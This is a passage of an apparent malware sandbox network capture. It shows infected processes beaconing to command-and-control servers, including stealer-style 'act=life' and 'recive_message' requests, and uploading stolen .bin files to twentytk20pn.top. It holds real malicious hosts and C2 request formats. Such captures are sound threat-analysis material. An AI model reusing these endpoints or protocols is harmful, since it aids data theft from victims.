                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                              Content-Length: 4
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                              Dec 18, 2024 11:48:27.896817923 CET219INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:48:27 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              24192.168.2.650010185.185.71.170803220C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:48:28.915647984 CET12360OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                              Host: twentytk20pn.top
                                                                                                                                                              Accept: */*
                                                                                                                                                              Content-Length: 76978
                                                                                                                                                              Content-Type: multipart/form-data; boundary=------------------------psxOhntH9I6CMXCWAl9J9e
                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 70 73 78 4f 68 6e 74 48 39 49 36 43 4d 58 43 57 41 6c 39 4a 39 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 57 61 67 61 63 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a f4 b4 86 3e 2d 41 f1 e9 26 96 53 41 5f 6d c6 57 20 c2 2d 8c b4 ab 0f 9e d3 dc ce 38 5b 18 20 29 06 51 2f 8e 22 e5 0f ae 23 5a 03 f0 dc 8c 6e d5 c5 7c c2 14 b0 2a 35 1e ed 3c 55 50 53 fa 89 f6 f1 b5 b1 d7 ec f9 9b e2 31 f3 2a 20 a6 50 7d 8c ab 3d 49 6f a9 8b 64 24 65 1f 1b 6a c6 f2 25 6a 36 cf 9e c1 08 7b 64 e9 df 5e f8 2a ae 63 0c f2 b7 a7 44 61 02 f0 ec e8 02 85 92 28 63 cb 8e 14 59 ec 8f 7c 81 8f 20 6b 4c d8 0d 4d ac 8b 1f 35 a1 6c d4 85 c1 c4 e6 a5 67 9b d5 78 3f b3 33 fb ec 4b 1c a3 c8 c1 a6 21 19 31 4f e6 ad 35 86 9c 1e 55 [TRUNCATED]
                                                                                                                                                              Data Ascii: --------------------------psxOhntH9I6CMXCWAl9J9eContent-Disposition: form-data; name="file"; filename="Wagaci.bin"Content-Type: application/octet-stream>-A&SA_mW -8[ )Q/"#Zn|*5<UPS1* P}=Iod$ej%j6{d^*cDa(cY| kLM5lgx?3K!1O5U*<ppKEs?P<iF7v$;zk=h87b6qknDF#omkV.@e5wv%9]}~?#q3s"b)5 -=/44|fX2VWcx~P_OiO%y!Qf#1=m!TAL),<b/1LEE(7!~w5Sa*g-5y]GJHX!}r5tmet"eJZivCU_'x>#G,ce^*d)X90q;q8|68g*Ow+&3j_%NYV&Fj5`1!fg>X]SaQ3w{wf%fDydT_6$o7$LcbHQhrXVo"I_o.Jl00<QIp&cZ)+RT0MD@'&^wLr}lBIem~ [TRUNCATED]
                                                                                                                                                              Dec 18, 2024 11:48:29.035299063 CET4944OUTData Raw: bb bc c8 8e c0 e6 a0 09 b0 35 ba 0b 61 28 89 0d 93 8f 8f 67 b4 a8 dd e7 75 89 35 a7 23 cf bd c6 5a 25 d4 92 2d e9 13 46 2d 47 92 2b 93 b8 58 75 35 66 f0 96 09 f7 e9 db f2 a9 a0 f5 0c 1c af d5 0c ee 51 cb 56 60 20 b7 93 91 b8 b6 1f d0 41 a6 2c 1c
                                                                                                                                                              Data Ascii: 5a(gu5#Z%-F-G+Xu5fQV` A, |qSyK'~"fb 9Bz\%emBJ"$7H~y/^f-m?plWjGfLyznm:2]d.7x(]]q
                                                                                                                                                              Dec 18, 2024 11:48:29.035367966 CET2472OUTData Raw: 3a 39 07 8b 76 c6 2b cd 37 04 fb 72 95 2d 21 02 27 1b c9 7f 97 9f 70 c7 42 2e a0 79 6b fe da 06 9e 45 39 68 9a b3 87 8b 70 15 5e fc db 3a 22 d9 67 0c 0c f7 c2 77 7b 1b 84 b2 16 8c a3 e4 8c fd 0b a4 4c 36 d3 8d aa 84 fb f6 61 22 ac b5 82 5c ee 73
                                                                                                                                                              Data Ascii: :9v+7r-!'pB.ykE9hp^:"gw{L6a"\se;FNa<ot*`xlgo+*yw},s&CKZ\qU'>_=V_UKyBIknffLT.c:yIKt7-GO`FdM
                                                                                                                                                              Dec 18, 2024 11:48:29.035399914 CET2472OUTData Raw: 2c 86 f8 bd 1c 77 41 7b 7c f0 f6 78 79 79 81 76 89 9f b1 78 02 ea cf cd bb cd a9 59 9b c6 05 9c 26 c4 d2 7c b4 e8 3f da 62 06 90 29 f1 40 6e 2e 9f 89 91 83 52 f6 91 6b 96 29 8c f6 4d d3 ec 6f 35 94 1f c4 46 e3 a0 30 f9 fb d4 d8 e7 88 c6 cb 9d eb
                                                                                                                                                              Data Ascii: ,wA{|xyyvxY&|?b)@n.Rk)Mo5F0Rd2A{if 'i'Rz;oSS]4__)na@~*Z;p#C7\!@Q"{-hsIMXZvsn;'85*4k4`;bMx'j
                                                                                                                                                              Dec 18, 2024 11:48:29.035470009 CET2472OUTData Raw: 6a 96 56 14 7d 8c 44 8c f1 23 09 b7 ef 1c ca 9e a3 47 39 10 71 c0 44 3a 19 df aa 50 c4 6a ca a2 7a f4 48 9a b0 ca 8f 5a 04 62 de d0 7c 6e a4 81 f2 98 96 98 89 48 4f c8 47 eb 5f 69 7a d2 89 5f 24 df dc 9b 4a ef 56 1a 9a f2 bd 6a 49 2c ca 96 84 f6
                                                                                                                                                              Data Ascii: jV}D#G9qD:PjzHZb|nHOG_iz_$JVjI,M$-SC7n]I {[AR-NP_n.5EujzL 9YH^>q.WK^/aj)[)Mdu+X>?1w9
                                                                                                                                                              Dec 18, 2024 11:48:29.035533905 CET1236OUTData Raw: f9 ca 6e 87 18 9e 42 57 45 89 f2 09 84 0b e3 ae f4 45 66 df fd 05 ad 2c f2 12 88 c7 51 4d 8c ba e4 b8 e5 b9 fc 7a b0 8e 0b 79 24 7a 62 f8 ea a1 b7 ac 75 57 8c 95 48 0f 95 9b 48 7f 01 5f f0 4c c6 c9 ed b5 b3 6d e9 45 7f fe b4 cb d7 34 15 1a 1b 70
                                                                                                                                                              Data Ascii: nBWEEf,QMzy$zbuWHH_LmE4pSBQx_FjsN-y-E?R+;tY'hAf+nb@({[yO@yH7ipDTYiocn^ELBevpQC7f1 ke$@NF<j+/r`O>~
                                                                                                                                                              Dec 18, 2024 11:48:29.035545111 CET3708OUTData Raw: 61 d5 ac 06 03 79 50 52 1d 62 66 e7 bd 21 40 6b a9 17 6c 90 92 6c 8a 3b 47 9c 7e 9d 27 1b c1 86 13 51 4f 9a 23 d4 73 05 1c b2 88 67 ab 2c e7 de 86 e3 60 ed 98 98 4d 57 dd c9 31 ea dd d2 4c bb b2 5d 0b 96 48 aa ce 69 bd 76 b9 e5 fe 42 4f a4 88 d3
                                                                                                                                                              Data Ascii: ayPRbf!@kll;G~'QO#sg,`MW1L]HivBO-qo?6q9R8B8|c_]ax>M@_v RP_)../,iO44 .Uj[_2.#q~+=>w/QMa+H*
                                                                                                                                                              Dec 18, 2024 11:48:29.035624981 CET2472OUTData Raw: 8a ae 12 d1 90 68 01 2b b2 a4 bd 1f 0a 97 4f 14 b3 8f 61 98 e8 e4 fc 71 b2 ed 35 c2 1a 3d fc 89 41 dc d3 9b 0b 1d e6 b5 75 45 65 de f0 87 28 6c fa 7e 1f 55 73 43 13 8b fe f3 a2 b0 1a 08 c6 5a 4c 1c 39 37 e3 82 c2 8d ba 4d ce da db df 92 2d 65 2a
                                                                                                                                                              Data Ascii: h+Oaq5=AuEe(l~UsCZL97M-e*J (I>/-jYf+3ffR%z9M/ge<_*M%:GwDpBVhs^ew9`!sR9KC#pmcwxdw}KB`[
                                                                                                                                                              Dec 18, 2024 11:48:29.035645008 CET2472OUTData Raw: ba 9f 2e e6 1c 64 bf 00 f8 ae af 7b 6f fb fd dd e0 b9 ef f7 8d 69 85 5e 69 01 7a a5 93 33 4e 8e 9d 52 16 c8 20 5d f5 0e bb 35 aa 59 bb 3a cb ae 0c fd 34 0c 50 d6 7c 52 9d 80 f0 c7 d8 25 f5 91 09 5e 5c cf 77 b7 4c 23 d3 d2 bc c1 2d 2f fb f0 c6 d0
                                                                                                                                                              Data Ascii: .d{oi^iz3NR ]5Y:4P|R%^\wL#-/4Ui83DNQ0V5!Q7Ie0}w1ITeLI*;)V@Srx+8Z0{"vyY6eA?tX>gu=[T%Q~l#zje#
                                                                                                                                                              Dec 18, 2024 11:48:29.035656929 CET2472OUTData Raw: f9 da d2 f3 a9 08 67 57 e2 7a ec 5e d5 9e 44 b1 fc 59 89 3a a2 d0 e8 b7 8d b7 b4 57 6c c5 01 08 5c cf d5 3f e5 8d eb 7d a9 f8 af 8d 62 90 3e eb ba ad f4 cb c8 a8 82 93 ab 20 0f 8e d6 78 3e 44 5d c8 3b 7b 18 b9 3b 91 40 21 73 74 0b 3c d0 39 5f 18
                                                                                                                                                              Data Ascii: gWz^DY:Wl\?}b> x>D];{;@!st<9_BLAu]Jkqaa.HFfz_*oK[WJJZ *\-sZ[/V]'$J1HKsfQFI<A.Z@<|j/wmyv4 (TEa!fr6
                                                                                                                                                              Dec 18, 2024 11:48:29.155402899 CET7416OUTData Raw: 39 26 69 be cd a0 27 d0 ef 30 0b fe e8 81 ce e0 d7 47 07 16 92 84 48 29 34 7d 57 ae 33 49 3e bc 4d 68 27 b4 11 90 b6 df 0c 74 c9 73 a2 28 ff 71 53 d8 1f 51 0e 30 5c b3 f5 d6 40 f7 2f 25 5e 7e 66 f0 e9 7e 6e 7c 45 5d e3 fc cb 56 05 06 84 c6 1e 9d
                                                                                                                                                              Data Ascii: 9&i'0GH)4}W3I>Mh'ts(qSQ0\@/%^~f~n|E]V*G>(ON,3"gy+MvTF!,UDfDD[xS2*S2+Aj6EI(~F+]wnDH&/#D9Ci3-hC/pV_
                                                                                                                                                              Dec 18, 2024 11:48:30.734391928 CET255INHTTP/1.1 200 OK
                                                                                                                                                              server: nginx
                                                                                                                                                              date: Wed, 18 Dec 2024 10:48:30 GMT
                                                                                                                                                              content-type: text/plain; charset=utf-8
                                                                                                                                                              content-length: 2
                                                                                                                                                              x-ratelimit-limit: 30
                                                                                                                                                              x-ratelimit-remaining: 28
                                                                                                                                                              x-ratelimit-reset: 1734520707
                                                                                                                                                              etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                              Data Raw: 4f 4b
                                                                                                                                                              Data Ascii: OK


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              25192.168.2.650012185.215.113.43806044C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:48:29.540636063 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                              Content-Length: 160
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                              Dec 18, 2024 11:48:31.603852987 CET196INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:48:31 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                              26192.168.2.650031185.185.71.17080
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:48:36.377635956 CET12360OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                              Host: twentytk20pn.top
                                                                                                                                                              Accept: */*
                                                                                                                                                              Content-Length: 30407
                                                                                                                                                              Content-Type: multipart/form-data; boundary=------------------------CCm8LMigJGORbWBQdmSru4
                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 43 43 6d 38 4c 4d 69 67 4a 47 4f 52 62 57 42 51 64 6d 53 72 75 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 59 69 6e 6f 72 75 66 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a d0 01 c7 10 0a b6 ae f8 34 08 50 ef 84 36 e0 26 34 1e 9c 88 90 9b b0 39 8a 47 fe 59 a9 4e 75 30 08 75 85 d9 40 bf a1 85 91 b3 f0 b7 da ed 21 09 6e cf 29 ef da cc c2 ae 22 5f f6 de c6 0a f9 c3 cf 17 24 b6 04 57 8b 3e 47 88 8f f2 f4 04 de e5 d4 77 6f f8 60 79 0f 2a 28 25 53 89 bc 67 41 0f d7 d9 d9 60 bb 3c a1 73 34 28 e8 6e bd 98 af 65 4b d5 94 21 b0 d7 87 5a 56 28 05 d8 91 93 6c bc 12 35 97 62 d8 4e c4 d0 af 64 c8 3d b9 9e a6 9c 76 e7 03 90 87 77 f5 90 53 3b 14 ba 48 f0 c5 da 7b cf 5b 29 69 9d b7 49 10 80 a2 06 90 c3 c8 49 c9 [TRUNCATED]
                                                                                                                                                              Data Ascii: --------------------------CCm8LMigJGORbWBQdmSru4Content-Disposition: form-data; name="file"; filename="Yinoruf.bin"Content-Type: application/octet-stream4P6&49GYNu0u@!n)"_$W>Gwo`y*(%SgA`<s4(neK!ZV(l5bNd=vwS;H{[)iIIG7p=Q1qhY=o{-utqqO`?mFx+SS6v38/DaH`9K_zKxk2ensn63L!aJ@6?^;Pr,&^4/;r3\U40'TAfN4pyJ5tQrN] _FDVy-nFs&JW=uc^fIWd|U;E,A0Y(`!z4M5c?v>'j*y:)"Fl Hgv<8uWn7tXHqdV8,Yw0#L{5FH";cj\O:8( K\*`OG3\Yqg>:/2ThT>c VoDeQSM(zj9Qbh;iCm@S<'le$8$kr;ZCdhA+i^djO59f [TRUNCATED]
                                                                                                                                                              Dec 18, 2024 11:48:36.499603033 CET2472OUTData Raw: 0c 23 8a ef 1f 0d 0f 14 a5 c2 bc 0a 34 f6 70 7c b2 33 b0 ee b8 e8 c5 67 e1 a4 d5 94 01 b1 85 d7 5e af 4d ce 8f 8d e3 41 d7 82 be 85 9c 6a 63 38 87 a8 b8 8b 8f 48 ed 4b db bd de f6 db cd d8 f9 87 a8 68 12 da 45 59 19 3a cd 1a e9 37 dc 31 18 c6 f4
                                                                                                                                                              Data Ascii: #4p|3g^MAjc8HKhEY:71b(xl$pqS*wALZ"+j!?tW,R]E}YO~uQ\L|HVmVdhjX:lGn"A U_DAL|1nN6e&KE
                                                                                                                                                              Dec 18, 2024 11:48:36.499639034 CET9888OUTData Raw: 0a 4f 06 49 09 b4 72 cb f2 1e 96 2e 41 a6 bf 93 f2 af 13 4a 12 4d e8 da 1a ea 45 e3 86 76 99 c4 bc 78 49 54 a4 c3 6b d7 ef 08 f3 0a 77 2f ef 90 a2 6a 00 e1 af e8 fd 33 83 b7 06 9f fe 8c 49 fe 12 af d3 3c 4e cd d8 80 d5 05 d9 35 85 39 47 47 68 0e
                                                                                                                                                              Data Ascii: OIr.AJMEvxITkw/j3I<N59GGhnB9CQE$]&6bHXqxM\SQ~gB[sBu+\S5q~\#&PJo42v]dOu'2#U|@0pG'd(_d
                                                                                                                                                              Dec 18, 2024 11:48:36.499676943 CET2472OUTData Raw: 2e 40 15 8e 3b d5 1b 03 20 8e 20 9f 22 ae 07 44 6e 60 36 3c 62 3f cd 2b ac 3b 48 0b 48 14 a8 04 e8 f5 fd 10 54 64 22 d1 1a a1 11 a2 4d a8 cf 3f cf f6 c9 c1 c8 f8 e2 68 e8 e6 d4 02 4b b3 31 7b 4b 59 8d 18 c7 46 b9 12 0d 23 ea 03 03 d7 9a 7b d9 8c
                                                                                                                                                              Data Ascii: .@; "Dn`6<b?+;HHTd"M?hK1{KYF#{RM~jJRB]+ST*&t;MK|<^\g((]x%Hd&$wmDI.`[Tvp)sfJcF1Ot
                                                                                                                                                              Dec 18, 2024 11:48:36.499697924 CET2472OUTData Raw: f1 c2 e6 c7 64 ca 4b a6 4b b1 24 e0 3c b4 a6 7f f7 24 44 d5 e3 cb ba 5f 2b f5 1a 29 92 91 50 60 00 67 7f 7b 2c 5a 7e 0d 19 44 fa 21 0b d9 ea db 64 a4 72 7b 71 54 18 f5 38 30 71 27 59 8c 0e 74 42 db fc 3f aa c6 77 96 e2 47 47 d2 50 9c 7a e6 e2 2f
                                                                                                                                                              Data Ascii: dKK$<$D_+)P`g{,Z~D!dr{qT80q'YtB?wGGPz/b\ }T1`1T@:jhYFQGI]?-.#zo*R~\%>dwRdZ/?6~G~Jo3lh*B(.OSH,8#ldLchg
                                                                                                                                                              Dec 18, 2024 11:48:36.499816895 CET927OUTData Raw: eb 14 11 d7 5b 78 be 3b b7 fc c7 0e f9 88 70 85 f2 25 a5 51 0e 36 cf 22 d5 4d a8 01 3b 9a e3 88 56 dd 7f c4 8c ba cd 25 9f 54 4f 24 cf c6 01 4c 98 60 09 b3 99 a6 f9 34 3f c9 85 18 c3 77 52 17 4f 3d 71 ae 17 1f 20 a4 d4 0b ae 44 e6 1b ff 56 69 22
                                                                                                                                                              Data Ascii: [x;p%Q6"M;V%TO$L`4?wRO=q DVi"/1Y"1hy#b76{@(%p=QwYs`d0%+f{s\x;5j".roEX68EBo|5x
                                                                                                                                                              Dec 18, 2024 11:48:38.006001949 CET255INHTTP/1.1 200 OK
                                                                                                                                                              server: nginx
                                                                                                                                                              date: Wed, 18 Dec 2024 10:48:37 GMT
                                                                                                                                                              content-type: text/plain; charset=utf-8
                                                                                                                                                              content-length: 2
                                                                                                                                                              x-ratelimit-limit: 30
                                                                                                                                                              x-ratelimit-remaining: 27
                                                                                                                                                              x-ratelimit-reset: 1734520707
                                                                                                                                                              etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                              Data Raw: 4f 4b
                                                                                                                                                              Data Ascii: OK


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                              27192.168.2.650033185.185.71.17080
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:48:39.297075033 CET199OUTPOST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                                                                                                                              Host: home.twentytk20pn.top
                                                                                                                                                              Accept: */*
                                                                                                                                                              Content-Type: application/json
                                                                                                                                                              Content-Length: 56
                                                                                                                                                              Data Raw: 7b 20 22 69 64 31 22 3a 20 22 57 35 49 30 34 52 4a 67 38 48 38 7a 6d 78 39 67 31 37 33 34 35 31 38 38 38 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 32 22 20 7d
                                                                                                                                                              Data Ascii: { "id1": "W5I04RJg8H8zmx9g1734518880", "data": "Done2" }
                                                                                                                                                              Dec 18, 2024 11:48:41.555954933 CET141INHTTP/1.1 200 OK
                                                                                                                                                              server: nginx/1.22.1
                                                                                                                                                              date: Wed, 18 Dec 2024 10:48:40 GMT
                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                              content-length: 4
                                                                                                                                                              Data Raw: 6f 6b 61 79
                                                                                                                                                              Data Ascii: okay


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              0192.168.2.649880104.21.64.804436112C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-12-18 10:47:43 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 8
                                                                                                                                                              Host: grannyejh.lat
                                                                                                                                                              2024-12-18 10:47:43 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                              2024-12-18 10:47:44 UTC1025INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:47:43 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=lqf6b12drsv3ma4mrreefv2716; expires=Sun, 13-Apr-2025 04:34:22 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NafVkSE49css8EnEoYPXsGivA%2BJkjBEjyk9w957D3THOVuCrHClrHQyBK3zWpS35OOUeLvULQugmjgtepEzLQRTbOKwXSC7Njg3s9Nkg5zKVnhQJjjrqFM2QPhd3NOnC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f3e938f3a948c83-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1813&rtt_var=692&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=904&delivery_rate=1568206&cwnd=189&unsent_bytes=0&cid=47903bbfdbf57719&ts=1080&x=0"
                                                                                                                                                              2024-12-18 10:47:44 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                              2024-12-18 10:47:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              1192.168.2.64990898.85.100.804433220C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-12-18 10:47:54 UTC52OUTGET /ip HTTP/1.1
                                                                                                                                                              Host: httpbin.org
                                                                                                                                                              Accept: */*
                                                                                                                                                              2024-12-18 10:47:55 UTC224INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:47:55 GMT
                                                                                                                                                              Content-Type: application/json
                                                                                                                                                              Content-Length: 31
                                                                                                                                                              Connection: close
                                                                                                                                                              Server: gunicorn/19.9.0
                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                              2024-12-18 10:47:55 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                                                                                                                              Data Ascii: { "origin": "8.46.123.189"}


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              2192.168.2.649930172.67.209.2024434544C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-12-18 10:48:02 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 8
                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                              2024-12-18 10:48:02 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                              2024-12-18 10:48:05 UTC1039INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:48:05 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=653ugek5cbk2lb8rpocoji1mnu; expires=Sun, 13-Apr-2025 04:34:42 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FqJXOswj204n1dFUWWCIrJnpcRLjeuISjmtjiZFAUK%2F1Ox%2BpQrP4Y4SpcA%2BXM9jK5zmjDXXavq4zfwBa%2F9eiy2ZcSHazJGWoJhZgi6sAHioG0Eoc8qUGMbRvkbZQeSKIvBL5O7E6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f3e940c09e8424b-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1594&rtt_var=623&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=910&delivery_rate=1720683&cwnd=248&unsent_bytes=0&cid=5f71c90ed2d633ed&ts=2456&x=0"
                                                                                                                                                              2024-12-18 10:48:05 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                              2024-12-18 10:48:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              3192.168.2.649941172.67.209.2024434544C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-12-18 10:48:06 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 46
                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                              2024-12-18 10:48:06 UTC46OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d
                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=FATE99--test&j=
                                                                                                                                                              2024-12-18 10:48:08 UTC1036INHTTP/1.1 200 OK
